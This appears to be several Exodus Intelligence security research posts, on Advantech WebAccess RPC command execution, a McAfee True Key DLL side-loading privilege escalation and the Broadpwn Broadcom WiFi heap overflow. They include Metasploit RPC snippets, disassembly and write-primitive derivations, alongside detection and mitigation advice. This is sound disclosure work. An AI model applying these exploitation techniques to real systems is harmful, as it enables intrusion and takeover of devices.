“If lpApplicationName is NULL, the first white space–delimited token of the command line specifies the module name. If you are using a long file name that contains a space, use quoted strings to indicate where the file name ends and the arguments begin (see the explanation for the lpApplicationName parameter). If the file name does not contain an extension, .exe is appended. Therefore, if the file name extension is .com, this parameter must include the .com extension. If the file name ends in a period (.) with no extension, or if the file name contains a path, .exe is not appended. If the file name does not contain a directory path, the system searches for the executable file in the following sequence:
The directory from which the application loaded.
The current directory for the parent process.
The 32-bit Windows system directory. Use the GetSystemDirectory function to get the path of this directory.
The 16-bit Windows system directory. There is no function that obtains the path of this directory, but it is searched. The name of this directory is System.
The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
The directories that are listed in the PATH environment variable. Note that this function does not search the per-application path specified by the App Paths registry key. To include this per-application path in the search sequence, use the ShellExecute function.”
From this description it is apparent that no directory traversal is needed to execute a command like ‘calc.exe’. Lets try to visualize the search process using some Metasploit code which triggers calc.exe using RPC opcode 0x1.
1 2 3 4 5 6
rpcBuffer = NDR.long(connId)+# connection ID
NDR.long(0x2711)+# vuln IOCTL
NDR.long(0)+
NDR.UniConformantArray("calc.exe\x00")# string passed to CreateProcessA()
dcerpc_call(0x1, rpcBuffer)
In the code above one creates an RPC buffer with the connection ID obtained via RPC opcode 0x4, the vulnerable IOCTL code, and the command to execute as a NULL terminated string, which will be passed to CreateProcessA. Once this buffer is created, it will be sent to the vulnerable Advantech WebAccess RPC server using RPC opcode 0x1, at which point a search operation will be conducted to find the location where calc.exe is located. This can be seen in the screenshot below.
Windows searching for the location of the calc.exe binary
Therefore, as a result of CreateProcessA’s behavior, an attacker could either choose to supply the full path to an executable file or provide just the executable filename and Windows would automatically locate and execute that binary based on the criteria given above. As a result, defenders cannot simply rely on detecting the presence of directory traversal characters to determine if the same IOCTL request is being abused for malicious purposes.
This proves that the aforementioned vulnerability can be categorized as an arbitrary command execution vulnerability and no directory traversal is required for its exploitation.
The Vulnerable Code Exists In Two Locations (Not One)
The vulnerable implementation of 0x2711 IOCTL is contained in two binaries, namely drawsrv.dll and viewsrv.dll. Tenable’s analysis only uncovered the implementation in drawsrv.dll and did not cover the vulnerable code located in viewsrv.dll. The alternative code path can be seen in the image below.
The code flow to this branch is the result of a subtle comparison made at 0x404838 within sub_4046D0 as shown below. Within this code, a comparison is made to see whether the connection type associated with a client’s RPC session is of type 0, in which case VsDaqWebService is called, or 2, in which case DsDaqWebService is called.
.text:00404838moveax,[esi+14h] .text:0040483B testeax,eax; check connType value .text:0040483D jnz short check_for_DsDaqWebService .text:0040483Fcmpebx,2710h .text:00404845jl ioctl_not_in_0x2710_0x4e20_range .text:0040484B cmpebx,4E20h .text:00404851jge ioctl_not_in_0x2710_0x4e20_range .text:00404857pushesi; proceed to call VsDaqWebService .text:00404857; located further down .text:00404858movecx,edi .text:0040485A call sub_4045B0 .text:0040485Ftesteax,eax .text:00404861jz short ioctl_not_in_0x2710_0x4e20_range .text:00404863moveax,[esi+4] .text:00404866testeax,eax .text:00404868jz short ioctl_not_in_0x2710_0x4e20_range .text:0040486A moveax,[esi+8] .text:0040486D testeax,eax .text:0040486Fjz short ioctl_not_in_0x2710_0x4e20_range .text:00404871push offset sub_403190 .text:00404876movecx,[ebp+arg_14] .text:00404879pushecx .text:0040487A movedx,[ebp+Dest] .text:0040487D pushedx .text:0040487E movecx,[ebp+arg_C] .text:00404881pushecx .text:00404882movesi,[ebp+Str1] .text:00404885pushesi .text:00404886pushebx .text:00404887movedx,[ebp+arg_4] .text:0040488A pushedx .text:0040488B calleax; VsDaqWebService .text:0040488D movecx,[ebp+arg_1C] .text:00404890mov[ecx],eax .text:00404892jmp short loc_4048DE .text:00404894; --------------------------------------------------------------------------- .text:00404894 .text:00404894 check_for_DsDaqWebService:; CODE XREF: sub_4046D0+16D↑j .text:00404894cmpeax,2 .text:00404897jnz short ioctl_not_in_0x2710_0x4e20_range .text:00404899cmpebx,2710h .text:0040489Fjl short ioctl_not_in_0x2710_0x4e20_range .text:004048A1 cmpebx,4E20h .text:004048A7 jge short ioctl_not_in_0x2710_0x4e20_range .text:004048A9 pushesi; proceed to call DsDaqWebService .text:004048A9 ; located further down .text:004048AA movecx,edi .text:004048AC call sub_4045B0 .text:004048B1 testeax,eax .text:004048B3 jz short ioctl_not_in_0x2710_0x4e20_range .text:004048B5 push offset sub_403190 .text:004048BA movedx,[ebp+arg_14] .text:004048BD pushedx .text:004048BE moveax,[ebp+Dest] .text:004048C1 pusheax .text:004048C2 movecx,[ebp+arg_C] .text:004048C5 pushecx .text:004048C6 movesi,[ebp+Str1] .text:004048C9 pushesi .text:004048CA pushebx .text:004048CB movedx,[ebp+arg_4] .text:004048CE pushedx .text:004048CF call DsDaqWebService
It can also be seen that the code handling the vulnerable 0x2711 IOCTL in both binaries look nearly identical.
Interestingly, the value on which the comparison is being performed comes from a different request and not the 0x2711 IOCTL request itself. This other request based on RPC opcode 0x4 has been described in detail by previous research such as ZDI’s. Instead of repeating the same analysis, it would suffice to say that the value being compared results from the connType value supplied as part of the request, as can be seen in the listing of opcode 0x4 as shown below.
As a result, an attacker can target the vulnerable code in both binaries just by changing the connType value as can be seen in the Metasploit code shown below.
While reviewing other publically documented RPC vulnerabilities in Advantech WebAccess, we discovered that the usual trend was to trigger the vulnerability using one specific RPC opcode, while in reality it could triggered using multiple opcodes. This doesn’t bode well for defenders as an attacker could trigger the same vulnerability using a different opcode and thereby bypass the signature meant to trigger on a specific opcode request.
The arbitrary command execution vulnerability in 0x2711 IOCTL is also reachable over opcode 0x0, in addition to opcode 0x1 as shown in earlier code. The modified code to trigger it using opcode 0x0 is shown below.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
# Triggering CreateProcessA() in viewsrv.dll using opcode 0x0
Users of Advantech WebAccess are advised to set a Remote Access Code during the installation to protect the RPC service from unauthorized requests. The screen for setting up the code is outlined below.
Additionally, users can setup a remote access code per project as shown below.
Conclusion
It should be apparent by now that keeping up-to-date on patches from a vendor or relying on public advisories isn’t good enough. One needs to dig deep into a patch and analyse it to know if it actually fixed the vulnerability it was supposed to patch. Furthermore, all paths leading up to the vulnerable code need to be analysed in order for companies to provide complete detection for a vulnerability.
The information mentioned in this blogpost has been available to our N-day feed subscribers since January 2018 when the first public advisory about the vulnerability was released. It has enabled them to ensure their defensive measures have been implemented properly even in the absence of a proper patch from the vendor and the lack of correct information in public advisories.
In this blog post, we examine the vendor-supplied patch addressing CVE-2018-6661. The vulnerability was initially reported to Intel Security (McAfee) in June 2017 and disclosed publicly in April 2018. Additionally, we contacted McAfee regarding the issues discussed in this post in August 2018.
Contributors: Omar El-Domeiri and Gaurav Baruah
At Exodus, we often encounter failed patches or discover adjacent zero-day vulnerabilities while conducting n-day vulnerability research. In 2018, our team has identified 24 publicly disclosed vulnerabilities that were reportedly patched but, in fact, were still vulnerable because the patch did not address the root cause. Failed patches can leave users at risk even if they vigilantly keep up with software updates and security advisories.
There are many reasons why a vendor-supplied patch may fail to improve the security of the software. In some instances, a patch may actually increase the attack surface and consequently introduce new vulnerabilities. While in other instances, a patch may be incomplete, leaving avenues by which the patch can be bypassed and the vulnerable code triggered. Often incomplete patches are the result of a vendor specifically patching for the PoC they receive from disclosure without addressing the root cause. In the case of CVE-2018-6661, we discovered an incomplete patch that left multiple ways for attackers to bypass the patch.
Summary
A publicly disclosed vulnerability for the Intel Security (McAfee) True Key software remains exploitable despite multiple vendor-supplied patches. Any logged in user, including the Guest account, can send a series of crafted requests to the True Key service to execute arbitrary code via a DLL-side loading attack vector. As a result, unprivileged users can escalate privileges to NT AUTHORITY\SYSTEM on any Windows machine with True Key installed.
Background
True Key is a password manager supporting several methods of sign-in including face and fingerprint, email, master password or by using a trusted device. It is freely available for Windows, Mac OS X, Android and iOS devices but requires a subscription to store more than 15 passwords. Until recently, True Key was bundled with Adobe Flash and required users to opt-out during installation.
When True Key is installed on Windows it includes an always running service that listens on TCP port 30,000 on the loopback interface 127.0.0.1 which runs with SYSTEM privileges. The service coordinates functionality across various components of the True Key software by providing RPC mechanisms. In the case of this vulnerability, we are interested specifically in the SecureExecute RPC method which launches executables trusted by McAfee where trust is verified by digital signature.
Patch
By examining the vendor’s patch, we can see that the patch only addresses the problem within the McAfee.TrueKey.Sync.exe and only for one of its DLL dependencies, namely the McAfee.TrueKey.SDKLibAdapter import.When the program is run, the dot net runtime will dynamically load DLL dependencies required by the program. We can identify the direct dependencies by the imports at the top. Since Windows searches for DLLs in a specified order outlined in Microsoft’s documentation it is possible to provide a modified DLL within the same folder so that it will be imported. It should be noted that System imports are contained in the known DLLs list and can not be used in this way by an attacker.
The patch enforces that the SDKLibAdapter library must be found in the C:\Program Files\TrueKey folder (C:\Program Files\McAfee\TrueKey in more recent versions) which can not be written to by an unprivileged user. However, the binary also imports the NLog logging library and does not enforce a path constraint for the corresponding DLL. The patch is incomplete because it overlooks this and hence the nlog.dll can be utilized to allow arbitrary code execution just as the McAfee.TrueKey.SDKLibAdapter.dll could be used in versions prior to the patch. Furthermore, any other McAfee signed binary can be used to exploit the vulnerability as long as the binary depends on a DLL outside the list of known DLLs. There are multiple ways to go about finding DLL dependencies.
Reversing True Key
Upon inspection of the decompiled TrueKey service binary, it is clear that it is an Apache Thrift based service.
Thrift is a software library and set of code-generation tools developed at Facebook to expedite development and implementation of efficient and scalable backend services. Its primary goal is to enable efficient and reliable communication across programming languages by abstracting the portions of each language that tend to require the most customization into a common library that is implemented in each language. Specifically, Thrift allows developers to define datatypes and service interfaces in a single language-neutral file and generate all the necessary code to build RPC clients and servers.
Examining the code auto-generated by thrift for the SecureExecute command, we can gather the data types expected for such a request to the service.From this code, we can create our own thrift file for the subset of the RPC service that is necessary for exploitation.
The SecureExecute method takes two parameters — a 32-bit integer clientId and a string specifying the path to an executable file to run. Before executing a RPC request, the service verifies that the clientId matches a known value that it has issued previously.
The handler for the SecureExecute API request will create a SecureExecuteCommand object, wrap it in a CheckedCommand object and pass it to the runner.Sync() method which will call the CheckedCommand object’s Execute() method. CheckedCommand verifies that the clientId supplied in the request matches an existing ClientId that the service has already issued. If so, then it calls the Execute() method of the wrapped object which in this instance is a SecureExecuteCommand object.
SecureExecuteCommand.Execute() will inspect the requested executable to ensure that the file has been digitally signed by McAfee before spawning a child process running the executable.
So in order to get the service to actually execute a binary, we must provide it with a valid clientId and the binary must be signed by McAfee. ClientIds are issued via the RegisterClient method whose sole parameter consists of a YAPClient struct that can contain any number of optional fields. On registration, the service verifies that the client is a trusted client by checking the port field from the YAPClient struct. The port field is used to find the corresponding PID listening on that port and then the service checks that the executable associated with that PID has been digitally signed by McAfee.
Exploitation
In order to exploit the vulnerability, we will need to send a SecureExecute request to the True Key service requesting that it execute the McAfee.TrueKey.Sync.exe in a folder that contains a modified nlog.dll. There are multiple utilities available, such as dnSpy, for modifying a compiled dot net executable or DLL directly. Since the McAfee.TrueKey.Sync.exe calls the GetCurrentClassLogger() method, we modified this method to launch a child process that executes a file containing our payload within the same folder.
The exploit will function as intended even though our modifications do not adhere to the method’s type signature. The return value of Process.Start() is not a Logger object and any further use of the value returned from this method will likely throw an error, but once this code has executed we can utilize the child process running our payload to gain escalated privileges.
Initially, we send a RegisterClient request to the True Key service to get a valid clientId. Since we know that the service itself listens on port 30,000, our RegisterClient request will specify that value for the port field in the YAPClient struct. In effect, the service will verify that it trusts itself as a valid client and respond with a new clientId.
With a valid clientId in hand, we send a SecureExecute request with that clientId and an executablePath pointing to our copy of the McAfee.TrueKey.Sync.exe within a folder containing our modified nlog.dll. The dot net runtime will load our modified nlog.dll and when the GetCurrentClassLogger() method is called our pop.exe payload will be executed.
We’ve written the exploit as a metasploit module and here is a demonstration:
Detection
Active exploitation can be detected by inspecting loopback traffic to port 30,000 for SecureExecute requests where the executablePath parameter does not start with the C:\Program Files\McAfee\TrueKey prefix.
Mitigation
Microsoft has an informative article on the topic of Dynamic-Link Library Security with recommendations for how developers can safeguard their applications against this kind of attack. At the application level, the SecureExecute method should reject any requests where the executablePath does not begin with a prefix to a known write-protected folder such as C:\Program Files\McAfee\TrueKey. Additionally, the RegisterClient method should treat the port specified in the request as untrusted user input and verify the client in a more secure manner. If your organization does not rely on True Key then uninstalling this software will remove the vulnerable service.
About Exodus Intelligence N-Day Subscription Offering
In addition to internally discovered zero-day vulnerabilities, Exodus Intelligence also offers a feed comprised of threats that have been publicly disclosed by outside organizations or the vendors themselves. Subscribers of our n-day offering gain access to a collection of vetted, reliable exploits and corresponding documentation enabling them to ensure their defensive measures have been implemented properly. This is critically important in cases where the vendor-supplied patch fails to address the root cause, since the existence of a patch may falsely assure users they are no longer at risk.
Disclosure
We disclosed the failed patch to McAfee and they published an update in response. However, we tested the latest version available (5.1.173.1 as of September 7th, 2018) and found that it remains vulnerable requiring no changes to our exploit.
We are pleased to announce the offering of our next training course. This is a 5 day course and will focus on vulnerability research on embedded systems.
Instructors
David Barksdale – David is Director of Research at Exodus Intelligence and manages the 0day team. David is an expert in software and hardware reverse engineering. Last year he won a PWNIE award for Best Server-Side Bug for a Cisco firewall RCE exploit. David started hacking at a young age and was published in the Summer 2001 issue of 2600. In fall 2003 he reverse engineered Yahoo! Messenger’s new authentication protocol and wrote an exploit for a 0-day vulnerability in Microsoft DirectX, all before graduating from The University of Texas with a bachelor’s degree in Computer Science. He has also contributed to the Linux kernel, the Open Embedded project, and many more open source projects.
Elvis Collado – Elvis is an up and coming Senior Researcher on Exodus Intelligence’s 0day team. Prior to Exodus, he worked at TippingPoint DVLabs where he researched submissions to the world’s largest and most diverse bug bounty program and developed filters for them. After DVLabs, Elvis worked as a consultant for Praetorian performing penetration tests for large manufacturers of embedded devices. While at Exodus, Elvis has developed several 0day exploits for market leading routers and firewalls.
Date & Location
February 18 through 22nd, 2019: Austin Texas
Requirements
Laptop
USB Type-A Ports – You’ll need to be able to use the provided breakout boards
Disassembler (IDA Pro or radare2)
Please be familiar with the disassembler you choose.
Experience with reversing binaries (any architecture)
VirtualBox or VMWare
An embedded device of your choice. (Warranties will be voided) Please select a reasonably sized device.
Description
This 5-day course is designed to help students gain the knowledge and experience needed to audit and exploit RTOS and Linux based embedded devices. Students will work through multiple case studies with physical devices to find and exploit each 0day vulnerability found by the trainers. Each case study will use a different device and highlight the approach used to find and exploit each bug. On the last day students will be encouraged to bring in their own device and apply all of the techniques that were taught with guidance from the instructors.
Expectations
Students will be gaining experience with:
Communicating with common serial protocols.
Utilizing the XI Hardware Interface Board
MIPS and ARMv7 architectures
Building custom toolchains
Organizing JTAG data dumps into something meaningful
Interpreting Datasheet(s)
Developing custom shellcode
Utilizing various methods for extracting firmware
Students will also be given challenges to work on outside of class.
Testimonials
“David and Elvis are tremendously knowledgeable and do an awesome job on explaining the techniques needed to interface with hardware targets and get to the work we care about: Finding and Exploiting Bugs. This class addresses when exploiting embedded targets is different than traditional targets and how those differences can be leveraged to make exploitation easier. I would definitely recommend this course to anyone getting into embedded exploit development.” – Anonymous Student
“The Introduction to Embedded Exploitation class provided by Exodus is one of the best technical course I have taken. The instructors are very knowledgeable in hardware and software exploitation and provide a very hands on course that will challenge and advance a security researchers skillset. I would recommend this class to anyone interested in hardware vulnerability research.” – Anonymous Student
“Exodus Intelligence provides some of the most advanced hands-on training in the field of modern exploit development and reversing “weird machines”.” – @SylerClayton
Fully remote exploits that allow for compromise of a target without any user interaction have become something of a myth in recent years. While some are occasionally still found against insecure and unpatched targets such as routers, various IoT devices or old versions of Windows, practically no remotely exploitable bugs that reliably bypass DEP and ASLR have been found on Android and iOS. In order to compromise these devices, attackers normally resort to browser bugs. The downside of this approach, from an attacker’s perspective, is that successful exploitation requires the victim to either click on an untrusted link or connect to an attacker’s network and actively browse to a non-HTTPS site. Paranoid users will be wary against doing either of these things.
It is naive to assume that a well-funded attacker will accept these limitations. As modern operating systems become hardened, attackers are hard at work looking for new, powerful and inventive attack vectors. However, remote exploits are not a simple matter. Local attacks benefit from an extensive interaction with the targeted platform using interfaces such as syscalls or JavaScript, which allows the attacker to make assumptions about the target’s address space and memory state. Remote attackers, on the other hand, have a much more limited interaction with the target. In order for a remote attack to be successful, the bug on which it is based needs to allow the attacker to make as few assumptions as possible about the target’s state.
This research is an attempt to demonstrate what such an attack, and such a bug, will look like.
Broadpwn is a fully remote attack against Broadcom’s BCM43xx family of WiFi chipsets, which allows for code execution on the main application processor in both Android and iOS. It is based on an unusually powerful 0-day that allowed us to leverage it into a reliable, fully remote exploit.
In this post, we will describe our thought process in choosing an attack surface suitable for developing a fully remote exploit, explain how we honed in on particular code regions in order to look for a bug that can be triggered without user interaction, and walk through the stages of developing this bug into a reliable, fully remote exploit.
We will conclude with a bonus. During the early 2000s, self-propagating malware – or “worms” – were common. But the advent of DEP and ASLR largely killed off remote exploitation, and Conficker (2008) will be remembered as the last self-propagating network worm. We will revive this tradition by turning Broadpwn into the first WiFi worm for mobile devices, and the first public network worm in eight years.
THE ATTACK SURFACE
Two words make up an attacker’s worst nightmare when considering remote exploitation: DEP and ASLR. In order to leverage a bug into a full code execution primitive, some knowledge of the address space is needed. But with ASLR enabled, such knowledge is considerably more difficult to obtain, and sometimes requires a separate infoleak. And, generally speaking, infoleaks are harder to obtain on remote attack surfaces, since the target’s interaction with the attacker is limited. Over the past decade, hundreds of remote bugs have died miserable deaths due to DEP and ASLR.
Security researchers who work with embedded systems don’t have such troubles. Routers, cameras, and various IoT devices typically have no security mitigation enabled. Smartphones are different: Android and iOS have had ASLR enabled from a relatively early stage [a]. But this definition is misleading, since it refers only to code running on the main application processor. A smartphone is a complex system. Which other processors exist in a phone?
Most Android and iOS smartphones have two additional chips which are particularly interesting to us from a remote standpoint: the baseband and the WiFi chipset. The baseband is a fascinating and large attack surface, and it doubtlessly draws the attention of many attackers. However, attacking basebands is a difficult business, mainly due to fragmentation. The baseband market is currently going through a major shift: If, several years ago, Qualcomm were the unchallenged market leaders, today the market has split up into several competitors. Samsung’s Shannon modems are prevalent in most of the newer Samsungs; Intel’s Infineon chips have taken over Qualcomm as the baseband for iPhone 7 and above; and MediaTek’s chips are a popular choice for lower cost Androids. And to top it off, Qualcomm is still dominant in higher end non-Samsung Androids.
WiFi chipsets are a different story: Here, Broadcom are still the dominant choice for most popular smartphones, including most Samsung Galaxy models, Nexus phones and iPhones. A peculiar detail makes the story even more interesting. On laptops and desktop computers, the WiFi chipset generally handles the PHY layer while the kernel driver is responsible for handling layer 3 and above. This is known as a SoftMAC implementation. On mobile devices, however, power considerations often cause the device designers to opt for a FullMAC WiFi implementation, where the WiFi chip is responsible for handling the PHY, MAC and MLME on its own, and hands the kernel driver data packets that are ready to be sent up. Which means, of course, that the chip handles considerable attacker-controlled input on its own.
Another detail sealed our choice. Running some tests on Broadcom’s chips, we realised with joy that there was no ASLR and that the whole of RAM has RWX permissions – meaning that we can read, write and run code anywhere in memory. While the same holds partially true for Shannon and MediaTek basebands, Qualcomm basebands do support DEP and are therefore somewhat harder to exploit.
Before we continue, it should be mentioned that a considerable drawback exists when attacking the WiFi chip. The amount of code running on WiFi chipsets is considerably smaller than code running on basebands, and the 802.11 family of protocols is significantly less complicated to implement than the nightmarish range of protocols that basebands have to implement, including GSM and LTE. On a BCM4359 WiFi SoC, we identified approximately 9,000 functions. On a Shannon baseband, there are above 80,000. That means that a reasonably determined effort at code auditing on Broadcom’s part has a good chance of closing off many exploitable bugs, making an attacker’s life much harder. Samsung would need to put in considerably more effort to arrive at the same result.
THE BCM43XX FAMILY [b]
Broadcom’s WiFi chips are the dominant choice for the WiFi slot in high-end smartphones. In a non-exhaustive research, we’ve found that the following models use Broadcom WiFi chips:
Samsung Galaxy from S3 through S8, inclusive
All Samsung Notes3. Nexus 5, 6, 6X and 6P
All iPhones after iPhone 5
The chip model range from BCM4339 for the oldest phones (notably Nexus 5) up to BCM4361 for the Samsung Galaxy S8. This research was carried out on both a Samsung Galaxy S5 (BCM4354) and a Samsung Galaxy S7 (BCM4359), with the main exploit development process taking place on the S7.
Reverse engineering and debugging the chip’s firmware is made relatively simple by the fact that the unencrypted firmware binary is loaded into the chip’s RAM by the main OS every time after the chip is reset, so a simple search through the phone’s system will usually suffice to locate the Broadcom firmware. On Linux kernels, its path is usually defined in the config variable BCMDHD_FW_PATH.
Another blessing is that there is no integrity check on the firmware, so it’s quite easy to patch the original firmware, add hooks that print debugging output or otherwise modify its behaviour, and modify the kernel to load our firmware instead. A lot of this research was carried out by placing hooks at the right places and observing the system’s behaviour (and more interestingly, its misbehaviour).
All the BCM chips that we’ve observed run an ARM Cortex-R4 microcontroller. One of the system’s main quirks is that a large part of the code runs on the ROM, whose size is 900k. Patches, and additional functionality, are added to the RAM, also 900k in size. In order to facilitate patching, an extensive thunk table is used in RAM, and calls are made into that table at specific points during execution. Should a bug fix be issued, the thunk table could be changed to redirect to the newer code.
In terms of architecture, it would be correct to look at the BCM43xx as a WiFi SoC, since two different chips handle packet processing. While the main processor, the Cortex-R4, handles the MAC and MLME layers before handing the received packets to the Linux kernel, a separate chip, using a proprietary Broadcom processor architecture, handles the 802.11 PHY layer. Another component of the SoC is the interface to the application processor: Older BCM chips used the slower SDIO connection, while BCM4358 and above use PCIe.
The main ARM microcontroller in the WiFi SoC runs a mysterious proprietary RTOS known as HNDRTE. While HNDRTE is closed-source, there are several convenient places to obtain older versions of the source code. Previous researchers have mentioned the Linux brcmsmac driver, a driver for SoftMAC WiFi chips which handle only the PHY layer while letting the kernel do the rest. While this driver does contain source code which is also common to HNDRTE itself, we found that that most of the driver code which handles packet processing (and that’s where we intended to find bugs) was significantly different to the one found in the firmware, and therefore did not help us with reversing the interesting code areas.
The most convenient resource we found was the source code for the VMG-1312, a forgotten router which also uses a Broadcom chipset. While the brcmsmac driver contains code which was open-sourced by Broadcom for use with Linux, the VMG-1312 contains proprietary Broadcom closed-source code, bearing the warning “This is UNPUBLISHED PROPRIETARY SOURCE CODE of Broadcom Corporation”. Apparently, the Broadcom code was published by mistake together with the rest of the VMG-1312 sources.
The leaked code contains most of the key functions we find in the firmware blob, but it appears to be dated, and does not contain much of the processing code for the newer 802.11 protocols. Yet it was extremely useful during the course of this research, since the main packet handling functions have not changed much. By comparing the source code with the firmware, we were able to get a quick high-level view of the packet processing code section, which enabled us to hone in on interesting code areas and focus on the next stage: finding a suitable bug.
FINDING THE RIGHT BUG
By far, the biggest challenge in developing a fully remote attack is finding a suitable bug. In order to be useful, the right bug will need to meet all the following requirements:
It will be triggered without requiring interaction on behalf of the victim
It will not require us to make assumptions about the state of the system, since our ability to leak information is limited in a remote attack
After successful exploitation, the bug will not leave the system in an unstable state
Finding a bug that can be triggered without user interaction is a tall order. For example, CVE-2017-0561, which is a heap-overflow in Broadcom’s TDLS implementation discovered by Project Zero, still requires the attacker and the victim to be on the same WPA2 network. This means the attackers either need to trick the victim to connect to a WPA2 network that they control, or be able to connect to a legitimate WPA2 network which the victim is already on.
So where can we find a more suitable bug? To answer that question, let’s look briefly at the 802.11 association process. The process begins with the client, called mobile station (STA) in 802.11 lingo, sending out Probe Request packets to look for nearby Access Points (APs) to connect to. The Probe Requests contain data rates supported by the STA, as well as 802.11 capabilities such as 802.11n or 802.11ac. They will also normally contain a list of preferred SSIDs that the STA has previously connected to.
In the next phase, an AP that supports the advertised data rates will send a Probe Response containing data such as supported encryption types and 802.11 capabilities of the AP. After that, the STA and the AP will both send out Authentication Open Sequence packets, which are an obsolete leftover from the days WLAN networks were secured by WEP. In the last phase of the association process, a STA will send an Association Request to the AP it has chosen to connect to. This packet will include the chosen encryption type, as well as various other data about the STA.
All the packet types in the above association sequence have the same structure: A basic 802.11 header, followed by a series of 802.11 Information Elements (IEs). The IEs are encoded using the well known TLV (Type-Length-Value) convention, with the first byte of the IE denoting the type of information, the second byte holding its length, and the next bytes hold the actual data. By parsing this data, both the AP and the STA get information about the requirements and capabilities of their counterpart in the association sequence.
Any actual authentication, implemented using protocols such as WPA2, happens only after this association sequence. Since there are no real elements of authentication within the association sequence, it’s possible to impersonate any AP using its MAC address and SSID. The STA will only be able to know that the AP is fake during the later authentication phase. This makes any bug during the association sequence especially valuable. An attacker who finds a bug in the association process will be able to sniff the victim’s probe requests over the air, impersonate an AP that the STA is looking for, then trigger the bug without going through any authentication.
When looking for the bug, we were assisted by the highly modular way in which Broadcom’s code handles the different protocols in the 802.11 family and the different functionalities of the firmware itself. The main relevant function in this case is wlc_attach_module, which abstracts each different protocol or functionality as a separate module. The names of the various initialization functions that wlc_attach_module calls are highly indicative. This is some sample code:
Each module initialization function then installs handlers which are called whenever a packet is received or generated. These callbacks are responsible for either parsing the contexts of a received packet which are relevant for a specific protocol, or generating the protocol-relevant data for an outgoing packet. We’re mostly interested in the latter, since this is the code which parses attacker-controlled data, so the relevant function here is wlc_iem_add_parse_fn, which has the following prototype:
The second and third arguments are particularly relevant here. subtype_bitfield is a bitfield containing the different packet subtypes (such as probe request, probe response, association request etc.) that the parser is relevant for. The third argument, iem_type, contains the IE type (covered earlier) that this parser is relevant for.
wlc_iem_add_parse_fn is called by the various module initialization functions in wlc_module_attach. By writing some code to parse the arguments passed to it, we can make a list of the parsers being called for each phase of the association sequence. By narrowing our search down to this list, we can avoid looking for bugs in areas of the code which don’t interest us: areas which occur only after the user has completed the full association and authentication process with an AP. Any bug that we might find in those areas will fail to meet our most important criteria – the ability to be triggered without user interaction.
Using the approach above, we became lucky quite soon. In fact, it took us time to realise how lucky.
THE BUG
Wireless Multimedia Extensions (WMM) are a Quality-of-Service (QoS) extension to the 802.11 standard, enabling the Access Point to prioritize traffic according to different Access Categories (ACs), such as voice, video or best effort. WMM is used, for instance, to insure optimal QoS for especially data-hungry applications such as VoIP or video streaming. During a client’s association process with an AP, the STA and AP both announce their WMM support level in an Information Element (IE) appended to the end of the Beacon, Probe Request, Probe Response, Association Request and Association Response packets.
In our search for bugs in functions that parse association packets after being installed by wlc_iem_add_parse_fn, we stumbled upon the following function:
In a classic bug, the program calls memcpy() in the last line without verifying that the buffer current_wmm_ie (our name) is large enough to hold the data of size ie->len. But it’s too early to call it a bug: let’s see where current_wmm_ie is allocated to figure out whether it really is possible to overflow. We can find the answer in the function which allocates the overflowed structure:
As we can see in the last section, the current_wmm_ie buffer is allocated with a length of 0x2c (44) bytes, while the maximum size for an IE is 0xff (255) bytes. This means that we have a nice maximum overflow of 211 bytes.
But an overflow would not necessarily get us very far. For example, CVE-2017-0561 (the TDLS bug) is hard to exploit because it only allows the attacker to overflow the size field of the next heap chunk, requiring complicated heap acrobatics in order to get a write primitive, all the while corrupting the state of the heap and making execution restoration more difficult. As far as we know, this bug could land us in the same bad situation. So let’s understand what exactly is being overflowed here.
Given that the HNDRTE implementation of malloc() allocates chunks from the top of memory to the bottom, we can assume, by looking at the above code, that the wlc->pm struct will be allocated immediately following the wlc->current_wmm_ie struct which is the target of the overflow. To validate this assumption, let’s look at a hex dump of current_wmm_ie, which on the BCM4359 that we tested was always allocated at 0x1e7dfc:
Looking at offset 0x2c, which is the end of current_wmm_ie, we can see the size of the next heap chunk, 0x7a – which is the exact size of the wlc->pm struct plus a two byte alignment. This validates our assumption, and means that our overflow always runs into wlc->pm, which is a struct of type wlc_pm_st.
It’s worthwhile to note that the position of both current_wmm_ie and pm is completely deterministic given a firmware version. Since these structures are allocated early in the initialization process, they will always be positioned at the same addresses. This fortunately spares us the need for complicated heap feng-shui – we always overflow into the same address and the same structure.
THE EXPLOIT
Finding a bug was the easy part. Writing a reliable remote exploit is the hard part, and this is usually where a bug is found to be either unexploitable or so difficult to exploit as to be impractical.
In our view, the main difficulty in writing a remote exploit is that some knowledge is needed about the address space of the attacked program. The other difficulty is that mistakes are often unforgivable: in a kernel remote exploit, for instance, any misstep will result in a kernel panic, immediately alerting the victim that something is wrong – especially if the crash is repeated several times.
In Broadpwn, both of these difficulties are mitigated by two main lucky facts: First, the addresses of all the relevant structures and data that we will use during the exploit are consistent for a given firmware build, meaning that we do not need any knowledge of dynamic addresses – after testing the exploit once on a given firmware build, it will be consistently reproducible. Second, crashing the chip is not particularly noisy. The main indication in the user interface is the disappearance of the WiFi icon, and a temporary disruption of connectivity as the chip resets.
This creates a situation where it’s possible to build a dictionary of addresses for a given firmware, then repeatedly launch the exploit until we have brute forced the correct set of addresses. A different, experimental solution, which does not require knowledge of any version-specific addresses, is given at the end of this section.
Let’s first look at how we achieve a write primitive. The overflowed structure is of type wlc_pm_st, and handles power management states, including entering and leaving power-saving mode. The struct is defined as follows:
Four members of this struct are especially interesting to control from an exploitation viewpoint: pspoll_timer and apsd_trigger_timer of type wl_timer, and pm2_rcv_timer and pm2_ret_timer of type wlc_hwtimer_to_t. First let’s look at the latter.
The function wlc_hwtimer_del_timeout is called after processing the packet and triggering the overflow, and receives pm2_ret_timer as an argument:
void wlc_hwtimer_del_timeout(wlc_hwtimer_to *newto) {
wlc_hwtimer_to *i;
wlc_hwtimer_to *next;
wlc_hwtimer_to *this;
for ( i = &newto->gptimer->timer_list; ; i = i->next ) {
this = i->next;
if ( !i->next ) {
break; }
if ( this == newto ) {
next = newto->next;
if ( newto->next ) {
next->timeout += newto->timeout; // write-4 primitive
}
i->next = next;
this->fun = 0;
return;
}
}
}
As can be seen from the code, by overwriting the value of newto and causing it to point to an attacker controlled location, the contents of the memory location pointed to by next->timeout can be incremented by the memory contents of newto->timeout. This amounts to a write-what-where primitive, with the limitation that the original contents of the overwritten memory location must be known.
A less limited write primitive can be achieved through using the pspoll_timer member, of type struct wl_timer. This struct is handled by a callback function triggered regularly during the association process :
As can be seen towards the end of the function, we have a much more convenient write primitive here. Effectively, we can write the value we store in field_1c into an address we store in field_18. With this, we can write an arbitrary value into any memory address, without the limitations of the previous write primitive we found.
